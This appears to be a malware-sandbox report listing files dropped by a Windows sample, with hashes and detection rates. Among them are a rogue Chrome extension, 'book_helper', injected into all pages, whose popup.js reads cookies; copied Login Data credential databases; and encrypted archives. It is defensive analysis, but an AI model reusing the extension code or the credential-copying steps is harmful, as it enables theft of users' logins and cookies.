                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                            MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                            SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                            SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                            SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\manifest.json
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2380
                                                                                                                                                            Entropy (8bit):5.687293760500434
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                                            MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                                            SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                                            SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                                            SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: {.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http://*/*", "https://*/*" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\popup.html
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):280
                                                                                                                                                            Entropy (8bit):5.048307538221611
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
                                                                                                                                                            MD5:E93B02D6CFFCCA037F3EA55DC70EE969
                                                                                                                                                            SHA1:DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
                                                                                                                                                            SHA-256:B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
                                                                                                                                                            SHA-512:F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: <!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\popup.js
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):642
                                                                                                                                                            Entropy (8bit):4.985939227199713
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
                                                                                                                                                            MD5:2AC02EE5F808BC4DEB832FB8E7F6F352
                                                                                                                                                            SHA1:05375EF86FF516D91FB9746C0CBC46D2318BEB86
                                                                                                                                                            SHA-256:DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
                                                                                                                                                            SHA-512:6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: $(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):5361
                                                                                                                                                            Entropy (8bit):5.18523361452614
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:nYrRT/Xrspi863rIV7Sk0JCKL8xF7bOEQVuwv:nYrd/t863rI9U4Kh
                                                                                                                                                            MD5:E85C8BFB1AA873B81991F3A93BC01A60
                                                                                                                                                            SHA1:AE68D1B6C2AD4F13905661F5EFD2E82EB9B097C6
                                                                                                                                                            SHA-256:3E456F0A84F60710BD3B7E269683BB131762132E42F91FA17FB24E0758B91D48
                                                                                                                                                            SHA-512:F1C0EB6C6F23CF9013350995C0DD0C48277F28227047A1432A7025D8944E755EF2AB75D1733288C780A677648C079AA17090F7767626A04187936BEB43AF024E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13245950583460399","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245950583260338","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245950640095768","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1538886"],"daily_received_length":["0","0","0","0","0","0","0",
                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):34636
                                                                                                                                                            Entropy (8bit):5.539363655448566
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:nEaf7D2XLl6y1kXqKf/pUZNCgVLH2HfjrUkG1UckPWdr+ZnCSvc:lqLvjV4n6
                                                                                                                                                            MD5:45D161FF46036E874E96C158B98503B0
                                                                                                                                                            SHA1:4A9B8AE785694C38605CBBAAF7AE4B14C28896D7
                                                                                                                                                            SHA-256:B7115F44F77E77858E2A5BCA842089BF1ABC6C8BF37D4CEEFD7E12061B989CBA
                                                                                                                                                            SHA-512:B808D3509DDC79B3A4E8B5479C3D65A61C05A35D9C9011DC21EB78B6EF5A3A02ADB7CA58E2F97904E732DE04D04DF9FE6C817606E1A491708758028D19AC52EC
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: {"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245950593233950","lastpingday":"13245947458518717","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m
                                                                                                                                                            C:\Users\user\AppData\Local\Login Data1615173735593
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40960
                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Login Data1615173776790
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40960
                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1615173736827
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:7-zip archive data, version 0.3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):37737
                                                                                                                                                            Entropy (8bit):7.994967159065528
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
                                                                                                                                                            MD5:5A6469A3F787ABD2AE93B47470528F79
                                                                                                                                                            SHA1:4032B59237CC883FB752D9727971B435F4D27EB8
                                                                                                                                                            SHA-256:1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
                                                                                                                                                            SHA-512:335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1615173771133
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:7-zip archive data, version 0.3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):553040
                                                                                                                                                            Entropy (8bit):7.999671101282436
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
                                                                                                                                                            MD5:A4427F2F46DEEA15CEA87BDBB53A22CC
                                                                                                                                                            SHA1:158501079514868D85246E970314A024FF263199
                                                                                                                                                            SHA-256:18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
                                                                                                                                                            SHA-512:334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
                                                                                                                                                            Malicious:false
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            Process:C:\Users\user\Desktop\IpB8f8qwze.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4882440
                                                                                                                                                            Entropy (8bit):7.9530465246504525
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:+PyrN2onLMeaojsO6QlbaRof/myjtFjhr/LS:+6hV4eDQO6QlWRoWyjt5hrG
                                                                                                                                                            MD5:1B59FC1A89C1BC88EA4E1B26DA579120
                                                                                                                                                            SHA1:6D1EB3583826AA70F437ABA38BEEE8B787C2DA7F
                                                                                                                                                            SHA-256:6A9B454B620677EA11F4F69156969468B0F43EBDFE27DABFB0CF16572F9379EB
                                                                                                                                                            SHA-512:9DCDE0A9F29D4A68697B9FD2C167C5FC468C5C315B12E769A2F4FC72519996E6E8219FC9386E4E710CC88F12EB43973E79193BF6EF7C755D923F50889344E703
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 19%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe:Zone.Identifier
                                                                                                                                                            Process:C:\Users\user\Desktop\IpB8f8qwze.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26
                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\MSI75EE.tmp
                                                                                                                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6656
                                                                                                                                                            Entropy (8bit):5.2861874904617645
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
                                                                                                                                                            MD5:84878B1A26F8544BDA4E069320AD8E7D
                                                                                                                                                            SHA1:51C6EE244F5F2FA35B563BFFB91E37DA848A759C
                                                                                                                                                            SHA-256:809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
                                                                                                                                                            SHA-512:4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: Setup.exe, Detection: malicious
                                                                                                                                                            • Filename: Setup.exe, Detection: malicious
                                                                                                                                                            • Filename: tyxCV1ouryr7.exe, Detection: malicious
                                                                                                                                                            • Filename: fnhcdXEfus.exe, Detection: malicious
                                                                                                                                                            • Filename: 6MhmlD8KZh.exe, Detection: malicious
                                                                                                                                                            • Filename: fnhcdXEfus.exe, Detection: malicious
                                                                                                                                                            • Filename: Cyfj6XGbkd.exe, Detection: malicious
                                                                                                                                                            • Filename: N1yprTBBXs.exe, Detection: malicious
                                                                                                                                                            • Filename: Cyfj6XGbkd.exe, Detection: malicious
                                                                                                                                                            • Filename: N1yprTBBXs.exe, Detection: malicious
                                                                                                                                                            • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                            • Filename: FileSetup-v17.04.41.exe, Detection: malicious
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):268744
                                                                                                                                                            Entropy (8bit):5.398284390686728
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
                                                                                                                                                            MD5:E2E9483568DC53F68BE0B80C34FE27FB
                                                                                                                                                            SHA1:8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
                                                                                                                                                            SHA-256:205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
                                                                                                                                                            SHA-512:B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 8%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):73160
                                                                                                                                                            Entropy (8bit):6.49500452335621
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
                                                                                                                                                            MD5:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                            SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
                                                                                                                                                            SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
                                                                                                                                                            SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):89600
                                                                                                                                                            Entropy (8bit):6.46929682960805
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
                                                                                                                                                            MD5:79CB6457C81ADA9EB7F2087CE799AAA7
                                                                                                                                                            SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
                                                                                                                                                            SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
                                                                                                                                                            SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):92080
                                                                                                                                                            Entropy (8bit):5.923150781730819
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                                            MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                                            SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                                            SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
                                                                                                                                                            SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\download\download_engine.dll
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3512776
                                                                                                                                                            Entropy (8bit):6.514740710935125
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                                            MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                                            SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                                            SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                                            SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):503808
                                                                                                                                                            Entropy (8bit):6.4043708480235715
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                                            MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                                            SHA1:F936F612BC779E4BA067F77514B68C329180A380
                                                                                                                                                            SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                                            SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):348160
                                                                                                                                                            Entropy (8bit):6.56488891304105
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                                            MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                                            SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                                            SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                                            SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):59904
                                                                                                                                                            Entropy (8bit):6.753320551944624
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                                            MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                                            SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                                            SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                                            SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
